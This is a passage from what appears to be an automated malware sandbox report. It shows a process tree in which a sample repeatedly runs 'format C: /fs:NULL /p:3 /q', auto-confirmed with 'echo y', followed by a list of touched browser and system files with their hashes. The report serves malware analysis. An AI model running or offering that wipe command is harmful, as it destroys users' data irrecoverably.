      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      2⤵
        PID:9316
    • C:\Windows\system32\format.com
      format C: /fs:NULL /p:3 /q
      2⤵
        PID:10024
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      2⤵
        PID:10324
    • C:\Windows\system32\format.com
      format C: /fs:NULL /p:3 /q
      2⤵
        PID:4308
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      2⤵
        PID:10312
    • C:\Windows\system32\format.com
      format C: /fs:NULL /p:3 /q
      2⤵
        PID:10272
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      2⤵
        PID:10344
    • C:\Windows\system32\format.com
      format C: /fs:NULL /p:3 /q
      2⤵
        PID:10412
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      2⤵
        PID:10996
    • C:\Windows\system32\format.com
      format C: /fs:NULL /p:3 /q
      2⤵
        PID:10572
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      2⤵
        PID:10616
    • C:\Windows\system32\format.com
      format C: /fs:NULL /p:3 /q
      2⤵
        PID:10656

Network

MITRE ATT&CK Enterprise v16

Downloads

  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\DawnGraphiteCache\data_1
    Filesize 264KB
    MD5 f50f89a0a91564d0b8a211f8921aa7de
    SHA1 112403a17dd69d5b9018b8cede023cb3b54eab7d
    SHA256 b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
    SHA512 bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
    Filesize 1KB
    MD5 b6eced7e034751b1d9b777fe035d709e
    SHA1 3c2c6fba247c46bf791b77fd65ef969c6e53bb17
    SHA256 1ab911b7a216519871cb3d29e0c2095093c327d02d877651901465b5e1e1d1bb
    SHA512 3ee4d93dbda0f4dec85a47fccc3bd151f4a412e217bd02476da2600ea220d95e318cd28171067142b307529215e21a326765072ca721ab1d9de23f50c660ae90

  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
    Filesize 354B
    MD5 20d851a3b613ebaa25df9c0fe3de3221
    SHA1 950a764ec6f5e3b44a3bcb69cb2b87411f6090f8
    SHA256 380a1c4ddc2892bf5c70ed4a30377e6a809d47270646cc01e31165a821858b67
    SHA512 4cfd4d22955fc10b93ff8393c389f0bcd0530194f04e42e9f50de0e962db0b7ac01c919b6780f59e73562e7c11fa9227f245778f33141eb0b4cddfa451fcc30a

  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
    Filesize 9KB
    MD5 48fd0f8bedd60ef9284c94814a01e2dc
    SHA1 9a3c4af4f01d9d34251fd5c63f4aee11f66200a2
    SHA256 06c40527501185f8a61d178106fa976293b4fc399968c5eb2581cac874948740
    SHA512 4838bb28b7d445231f73bef44eead17b5a947fb648e7bbe33f9396dab136d06b7a56bde4e53840dbc50bd9f2283b8b41130d5699839c464ebefba0603c241f9d

  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
    Filesize

                                                                                                                                                                                                                                          15KB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          c0f738fac7f7f4abd16f730c578332f5

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          9246cfaea53d76cdec1ae191ebff9bef4c6d3812

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          0eebff33d23429faeb502b782cee9443f9273e010ce2a2765bec12a057487337

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          c3030c7c9ac047334ec379aacbe2fe70db0db625ef6b0026317ef819434c28005b5261c0f1e1a84d8e2754a69e84f052f8dd727a4c2d57b5fe3fabd18c63d913

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          72B

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          0df6cbc19df40a0361d51146d37fc327

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          49bb54f43b138f6f0af5d070f09b64e89ef4e59e

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          3cd2bef32e1919e9d1767ad1180f73848c928b0ce8345186fbcbdd09ba3bbef1

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          7b2f947248025586cb080ff29dca8ce9fd66a058e0a4d0164df148aaffe411f9082f03f69ee9c31558f283830705e3d3e27a27eb7cc0d646fecf40c10fc47d00

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe5948d7.TMP

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          48B

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          27248b7dc5b56e5d017b565beb089018

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          e95d840988bef195b74099cc645119471c85b73c

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          5eec9b9ed18b57b102dda84e3f124d71e560839999c70b5279718c517e0838bb

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          fb3ac4a407e9ecbaaf838e00b207282fb6a4d0cf9aa10f725b871b5389e2cd7a275bc62cf373cb9fa5e95488e74fc41d9e9070e44d9e05306e4c98f2d917d959

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          81KB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          6af8692b49678d7f8652cc01c9702070

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          96d02f15b82333f6b2a72eac9a9f1b9be86e9994

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          7b5f397f0bc0814e165fb0387b28d462a4564136404b4d09329baa1e576e7b65

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          b5b7d0622d91f6eff7daa9eb2f44bc788a6fd17aa20678ed06e1a4d16be6e645c26397dd380c4116e6adbe59a7b3bff0c7b70ec057695c3b3639163245bfb783

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          80KB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          d20dfd0608a0a5b5253f683a9e44d2f3

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          2b73357881a7f97b076d2cf63810ccb16302e945

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          92656c4743c714ac9ac46a6f08007b125bdd555ef966786765275767fa808789

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          6660e02248cc641fa0806d6f3680ea0d1d70e3f3c29d195b4b7b7fadbe343f3398337c76f5b3402b6e33d972c199c5211f6ebf67fd6828cddc48cd21d2813868

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          2KB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          2f57fde6b33e89a63cf0dfdd6e60a351

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          445bf1b07223a04f8a159581a3d37d630273010f

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\blocklist

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          105KB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          d57316a5fdde78663db40c63ffefd92d

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          b66c673cc5b7255a1cd96526bf230e1e5cf5b6e2

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          8dccfa3be3d3c4e8cdd0c42b6df2663badc6f530531d194aaefd46b6e4dccd5f

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          284538dff0d8f3e30a0fa747b644b80309d30eea729b7810ba215f378c816d299c5653e81db324e476794db643c529aa6780d4c1bf303306c6ba67e4b6362ddc

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          280B

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          2b5dd617bc51c4c1ccb00b32b7a551cb

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          7d736ba05663d721e586cb765fdbd30b8c95f5ae

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          cace12b31caef21a04e9b72cdaded7f3dab5d6e633385a91bb370c92f8eb1b69

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          6892aa73a27cd9b85f3361a933c7e47572df7d13e21ab914b37f715deee1e8d7341f1bcc4a9a17daa1d1fbef44ddfd3bfc0ae2d8d8e3b8802f0dd9ab56bff98b

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          280B

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          5a7e1750438748bd333b79a94ca69b2a

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          94fd1be56969e269ce195ba29c3d464d356d6556

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          6d7a64a318c25c643323d5cf1c0c80ccf2f2433e7d74b722fca90468f8f9b914

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          842509c0f495ee24d152ab3f7867183d7cd64b01b5a9305405682abbbff3aa18a8ad7d97ee039393fdd1766fc17ad2df1caf711dc4db8dc7b9df608ffc0fdc7e

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          280B

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          eec55fe349980566b1dbf1d409d28c3e

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          654ce4b550defea0851f12e8ff81ae9298bb3f60

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          2e81ea3d7ddfc0274f3955d5131143c481e63f2529514c5295873b393d508efe

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          58e02658d08732b5f36e868331a483b5fde15475a6c5f704a19c97d920399c3f7d41a8fa163c66683bf403598f8f48f0cf9fa468f9783fcabd9136a55cec0059

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          5KB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          e3e7dddc4837e1b811b4447f71df51c9

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          ce3c479dc8dee85a98b6bf6450ba01ce03ca888a

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          e2cfc3fdaa2c4f827d3a1ecb40cd55485fa23ed1b90549fdba37affbf7bc31bc

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          d79b1a0dae17af37967fc9af7e69ebfdc72d430db8153f56bc2c6aa92638f5644b37eaa6da345f805a619d30c447addaeef035afc3968e8d8bd26495f0517b35

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index~RFe5808b5.TMP

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          3KB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          33fc327427c952d608f625b992c9958b

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          3a59991897e0693be3c14285a77b97a413067616

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          3c60e60011d9b3eb200784b7e0bba37da3a7519326261ac7d92da9eac73928f7

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          d98267fbb69511a94f4285c3d49745a4ea6cd264934501f1c45b05f510fb0e65abd70d90d3d79bf0038a9ac4ea682e9c39132e6033b5436f5e881d49514849b5

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DualEngine\SiteList-Enterprise.json

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          2B

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          99914b932bd37a50b983c5e7c90ae93b

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          69KB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          164a788f50529fc93a6077e50675c617

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          c53f6cd0531fd98d6abbd2a9e5fbb4319b221f48

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          b305e470fb9f8b69a8cd53b5a8ffb88538c9f6a9c7c2c194a226e8f6c9b53c17

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          ec7d173b55283f3e59a468a0037921dc4e1bf3fab1c693330b9d8e5826273c917b374c4b802f3234bbb5e5e210d55e52351426867e0eb8c9f6fba1a053cb05d4

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.91.1_0\_locales\en_US\messages.json

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          1KB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          578215fbb8c12cb7e6cd73fbd16ec994

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          9471d71fa6d82ce1863b74e24237ad4fd9477187

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          102b586b197ea7d6edfeb874b97f95b05d229ea6a92780ea8544c4ff1e6bc5b1

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          e698b1a6a6ed6963182f7d25ac12c6de06c45d14499ddc91e81bdb35474e7ec9071cfebd869b7d129cb2cd127bc1442c75e408e21eb8e5e6906a607a3982b212

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.91.1_0\manifest.json

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          2KB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          d7f153bc1705e465c201f5ba53bd25ab

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          055f9a40028bbf43f9ef36355e41b666d505716e

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          15fc4a643e54ecb6b4ccacf11b14b314ccbdd534204bea8a46c5886627d224fa

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          b782fe9bd5bfdf9dd63b722aa1a84d14d49116faccda91e38973318e4b958554de891c4404d5d86ac9cf9307ac5e61638080f95a7ebf00ce1c762815b9f04bc1

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.1_1\content.js

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          9KB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          3d20584f7f6c8eac79e17cca4207fb79

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          3c16dcc27ae52431c8cdd92fbaab0341524d3092

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          0d40a5153cb66b5bde64906ca3ae750494098f68ad0b4d091256939eea243643

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          315d1b4cc2e70c72d7eb7d51e0f304f6e64ac13ae301fd2e46d585243a6c936b2ad35a0964745d291ae9b317c316a29760b9b9782c88cc6a68599db531f87d59

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\HubApps

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          108KB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          06d55006c2dec078a94558b85ae01aef

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          6a9b33e794b38153f67d433b30ac2a7cf66761e6

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          088bb586f79dd99c5311d14e1560bbe0bb56225a1b4432727d2183341c762bcd

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          ec190652af9c213ccbb823e69c21d769c64e3b9bae27bea97503c352163bf70f93c67cebbf327bfc73bfd632c9a3ae57283b6e4019af04750fe18a2410a68e60

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          19KB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          f070db5a804f373aa9d6f1236ec3cbc1

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          d2813838dee70f980e7620d81fa46473fb1dc081

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          6933e83e6c3d4c0d9f8005173241c52a40464762d77227819ab3d55ca19cab9a

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          3bb5010145bbf45c64b7ebdf4e1f518d81635a2a4ca150755621e0ecd536495576b9541da6ccbe72bb12043164503040430baceca402403b2ec209fecc0d3671

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          111B

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          285252a2f6327d41eab203dc2f402c67

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          2B

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          d751713988987e9331980363e24189ce

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          97d170e1550eee4afc0af065b78cda302a97674c

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

• C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences (16KB)

• C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences (20KB)

• C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences (36KB)

• C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\Logs\sync_diagnostic.log (4KB)

• C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\CloudConfigLog (23KB)

• C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\CloudConfigLog (876B)

• C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\CloudConfigLog~RFe585b3a.TMP (467B)

• C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\OperationConfig (22KB)

• C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\OperationConfig~RFe585abd.TMP (3KB)

• C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State (39KB)

• C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State (30KB)

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          6KB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          2fbf45f98135be6e393ad17dec464708

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          6f157e2ea075c94a424c1e927cf93e70045f45c6

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          a59f14c9cc883be4f81e1dccf2f0a016fbcbfb74864b2eac6e2048d4f0fbc529

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          e3e05d2e9d2988b73a98d813e23f6d19331e41e4c233eb25ff6d77159762df36f9b4a1b244a8538016360e1e8be004d20315f919e0afefa5fa8b2faf17c3f96e

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          7KB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          c2d5c41ce7ec526dc856e4251dd1e93d

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          b731c1cc2d0a7f8d61fc75075d1c666c578a25fe

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          35309901475f1f2f5b167911df273331c1f001c407981bd39d4c77824912a10b

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          380fd4dbe2c5bf519bff2a3090495b13904725c7a32b7e6699ca55fa88bba7a1ef4fda94f9086de29c7cb1119b094187ff7aa87965d0b23c60650a5ede08519f

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          30KB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          80b19c505c7e5c9cb8db301e09cf286f

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          42f96f618dc4c5bcdb32170f6f4504c3e50e880e

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          e7ca3cd1d8dcf44e61bc87422921c6533457868adb7aa9efc7f9e22ed8b591d2

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          c93fbe2fad0a13fa794ecbec6339f1f51ac931e380fb9fd7e6a2acbd9eef53719dad5ad3611bd820596d8540884348a98c56f012948631c5b7fcac8b28dc2737

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          30KB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          feb25d0151b98fc146e42a92c4a537d6

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          7451a4b20e33bb5bceee39be997382be23790c0b

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          f66b66f9279c8cd0f96ad664d3defe5cd93147ed61d3bf2586915785ec9036fd

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          71cdd83058dc580f86bfa190e79e133b0d0eb67635f21a7daf71269418b442e73a6684b8a02bab495e4e91c427ef8804a7688711d418a57b62587406d2d208ae

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          2KB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          3788b5a0a4969d1b84c367bd6b45c5ea

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          050151ef238d8011b8b9b06971fead21df62dfaa

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          83016e0b4cc9d49c14700b9b655e25a30afd927f66b10dcc1cf882de7a006667

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          39895781f2790a8bd0c8ea827f4affe49caace3991a51fdabce4f2a5b0d8206f1989d22120de33636a6c5f963f78d179abfcb633250a21c31b83b2c7b75f43e6

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          1KB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          75bfef5f222eb8e57b4fc25d599a9b73

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          f11e28791ad3ae64a67477363f63b91bb9cdd7a4

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          ca02b53396df5810f5d667890181e7d4e434933212c71dd6acf1972f4fba07c6

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          7e1ab752cf52c1284168e2627fd949bb2b49f6fe9f5ea8222373ce6e6b4bdae58116db4e5e7d61ca4f8234f19f9e015a02dcb88c93fb2770efbcd58a65064d41

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-ServerMode

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          64B

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          446dd1cf97eaba21cf14d03aebc79f27

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          36e4cc7367e0c7b40f4a8ace272941ea46373799

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\09c00bdd-6796-4395-ac82-44f1166e9145.tmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          1B

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          5058f1af8388633f609cadb75a75dc9d

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          3a52ce780950d4d969792a2559cd519d7ee8c727

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\601f1562-e137-44fd-8e02-67e3ef2f0f25.tmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          10KB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          78e47dda17341bed7be45dccfd89ac87

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          1afde30e46997452d11e4a2adbbf35cce7a1404f

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          67d161098be68cd24febc0c7b48f515f199dda72f20ae3bbb97fcf2542bb0550

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          9574a66d3756540479dc955c4057144283e09cae11ce11ebce801053bb48e536e67dc823b91895a9e3ee8d3cb27c065d5e9030c39a26cbf3f201348385b418a5

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_p4moayzq.egd.ps1

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          60B

                                                                                                                                                                                                                                          MD5

